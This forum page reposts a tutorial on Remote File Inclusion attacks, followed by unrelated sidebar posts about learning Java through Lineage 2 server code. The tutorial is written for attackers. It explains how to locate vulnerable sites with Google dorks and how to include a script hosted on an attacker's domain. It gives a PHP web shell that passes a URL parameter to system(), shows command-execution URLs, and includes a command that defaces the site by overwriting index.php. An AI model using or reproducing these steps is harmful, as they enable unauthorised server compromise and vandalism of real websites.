Jump to content
MaxCheaters Official Group on Discord
-> Place your ad text here <-
We're Rebuilding – Join Our Staff Team

Remote File Inclusion [RFI]

The High Roller
 Share

Recommended Posts

The High Roller Newbie

The High Roller

Posted
Posted

 

What Is RFI(Remote File Inclusion)/Introduction:

-----------------------------------------------------------

RFI stands for Remote File Inclusion that allows the attacker to upload a custom coded/malicious file on a website or server using a script. The vulnerability exploit the poor validation checks in websites and can eventually lead to code execution on server or code execution on website (XSS attack using javascript). This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of tutorial, I suppose you will know what it is all about and may be able to deploy an attack or two.

 

RFI is a common vulnerability and trust me all website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and do almost anything. What makes it more dangerous is that you only need to have your common sense and basic knowledge of PHP to execute this one, some BASH might come handy as most of servers today are hosted on Linux.

-----------------------------------------------------------------

Starting with RFI

 

Lets get it started. The first step is to find vulnerable site, you can easily find them using Google dorks.If you don't have any idea, you might want to read about advanced password hacking using Google dorks or to use automated tool to apply Google dorks using Google. Now lets assume we have found a vulnerable website

 

http://victimsite.com/index.php?page=home

 

As you can see, this website pulls documents stored in text format from server and renders them as web pages. We can find ways around it as it uses PHP include function to pull them out. Lets check it out.

 

http://victimsite.com/index.php?page=http://hackersite.com/evilscript.txt

 

I have included a custom script "evilscript" in text format from my website, which contains some code.Now, if its a vulnerable website, then any of these 3 things can happen

----------------------------------------------

    Case 1 - You might have noticed that the url consisted of "page=home" had no extension, but I have included an extension in my url,hence the site may give an error like 'failure to include evilscript.txt.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.

 

    Case 2 - In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.

    Case 3 - successfull execution :)

----------------------------------------------

Now once you have battled around this one, you might want to learn what to code inside the script. You may get a custom coded infamous C99 script (too bloaty but highly effective once deployed) or you might code yourself a new one. For this knowledge of PHP might come in handy. Here we go

-------------------------------------------

<?php
echo "<script>alert(U 4r3 0wn3d !!);</script>";
echo "Run command: ".htmlspecialchars($_GET['cmd']);

system($_GET['cmd']);
?>

--------------------------------------------

The above code allows you to exploit include function and tests if the site if RFI (XSS) vulnerable by running the alert box code and if successful, you can send custom commands to the linux server in bash. So, if you are in luck and if it worked, lets try our hands on some Linux commands. For example to find the current working directory of server and then to list files, we will be using 'pwd' and 'ls' commands

 

 http//victimsite.com/index.php?cmd=pwd&page=http://hackersite.com/ourscript

 

http//victimsite.com/index.php?cmd=ls&page=http://hackersite.com/ourscript

 

What it does is that it sends the command as cmd we put in our script and begins print the working directory and list the documents.Even better you can almost make the page proclaim that you hacked it by using the 'echo' command.

 

 cmd=echo U r pwn3d by dwg> index.php

 

It will then re-write the index.php and render it.In case, its a primitive website which stores pages with .txt extension, you might want to put it with along the .txt files. Now as expected, we are now the alpha and the omega of the website :) we can download, remove, rename, anything! Want to download stuff ? try the 'wget' function...

 

I leave the rest to your creativity !

 

Original Source:

http://securityxploded.com/remote-file-inclusion.php

  • 2 weeks later...
  • 4 weeks later...

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share
Go to topic listing


  • Posts

    • Artemis37
      Rose Interface Source (p520)

      By Artemis37 · Posted

      Do you sell interlude interfaces?
    • Databay
      █ 7,000,000+ RESIDENTIAL PROXIES ✅ FROM 0.65$ / GB █

      By Databay · Posted

      This is a bump
    • Nightw0lf
      How to start learning Java using Lineage 2 as an example?

      By Nightw0lf · Posted

      in conclusion when somebody who has a project for 10+ years still on development writes an e-say to try until you succeed and then advertises his project, one of the reasons is he needs money, so l2j has once more become pure expensive hobby, you wont make money out of it.   You can still use L2jFrozen and get better results for this, i know some people that done it    keep in mind that C in aCis stands for Crappy, and after all these years its not a cool wordplay anymore, its a fact, prove me wrong.
    • Tryskell
      How to start learning Java using Lineage 2 as an example?

      By Tryskell · Posted

      First, don't really follow the "main voice", moreover if you consider it an hobby. Simply do what you want, you got only one life so use it as you want. If you make it an hobby, it's exactly like piano, or velo - only practice makes you better.   Secondly, how do you learn things ? It's actually a really important question, since some can simply be scholar, read books (theory) then practice ; and some simply can't read books. I'm the second type, I hated school, I find it boring - my knowledge in Java comes from try-and-fail. You improve your coding style every year or so, I can myself rewrite my own code (which I already considered top-notched) after a while. You always learn something new - even if Java barely evolves. L2J is a fun way to learn programming, it's a giant sandbox where you can edit anything, and I believe it should be taken as it.   My own way of learning was as follow : Add existing customs, no matter what they are : the point is to know main classes used by L2J / customs. L2J is barely Java knowledge ; the true knowledge is to know WHAT to search in WHICH location (what I call, organization). You have to understand than EVERYTHING you think already exists, in a form on another, in the source code. A custom is only the association of the different mechanisms you found "here and there", glued together in a proper goal. Once you know main classes to edit, and the customs you added are compiling fine, the main point is to know WHAT exactly you DID. Try to understand WHY and WHERE you actually copied the code. Third point would be to MANIPULATE the customs you added in order to fit your wish. First edit little values, then logic conditions ; eventually add a new Config, or a new functionality to the custom. Fourth point would be to begin to craft your own ideas. Once again, EVERYTHING already exists, in a form or another. You want a cycled event ? You got Seven Signs main task as exemple. Npc ? Search any type of Npc and figure out what it does. Fifth point would be to understand Java - mostly containers (WHAT and WHERE to use them), variables types and main Java mechanisms (inheritance, static modifier, etc). You should also begin to cut your code into maintainable classes or methods. Java can actually run without optimization, but bigger your ideas, more optimized and well-thought it should be. It's direct saved time in the future, and you would thank yourself doing so. Main tips : ALWAYS use any type of versioning system - GIT or SVN. It allows to save your work, step by step and eventually revert back anytime you want if you terribly messed up. L2J is 80% organization knowledge, and 20% Java knowledge. Basically, if you know WHAT and WHERE to search, if you aren't dumb, it's easy to replicate and re-use things. Cherry on top is to use a already good coded pack to avoid copy-paste crap and get bad habits. Avoid any type of russian or brazilian packs, for exemple - their best ability is to leak someone's else code. Obviously you need some default sense of logic, but Java and programming in general help you to improve it.   Finally, most of your questions could be solved joining related Discord (at least for aCis, I can't speak for others) - from the moment your question was correctly asked (and you seemed to search for the answer). My community (and myself) welcomes newbies, but got some issues with noobies.   The simpliest is to try, fail and repeat until you succeed - it sounds stupid, but that's basically how life works.   PS : about Java ressources, before ChatGPT, it was mostly about stackoverflow website, and site like Baeldung's one. With ChatGPT and alike, you generally double-cross AI output to avoid fucked up answers. Also, care about AI, they are often hallucinating really hard, even today. They can give you complete wrong answer, you tell them they are wrong, and they say "indeed, I suck, sorry - here's a new fucked up answer". You shouldn't 100% rely over AI answer, even if that can give sometimes legit answers, full code or just skeletons of ideas.   PPS : I don't think there are reliable ressources regarding L2J itself, also most of the proposed code decays pretty fast if the source code is actually maintained (at least for aCis). Still, old coded customs for old aCis sources are actually a good beginner challenge to apply on latest source.
    • Atom
      L2 Reborn x1 Origins

      By Atom · Posted

      Add prices please.

  • Topics

×
×
  • Create New...

AdBlock Extension Detected!

Our website is made possible by displaying online advertisements to our members.

Please disable AdBlock browser extension first, to be able to use our community.

I've Disabled AdBlock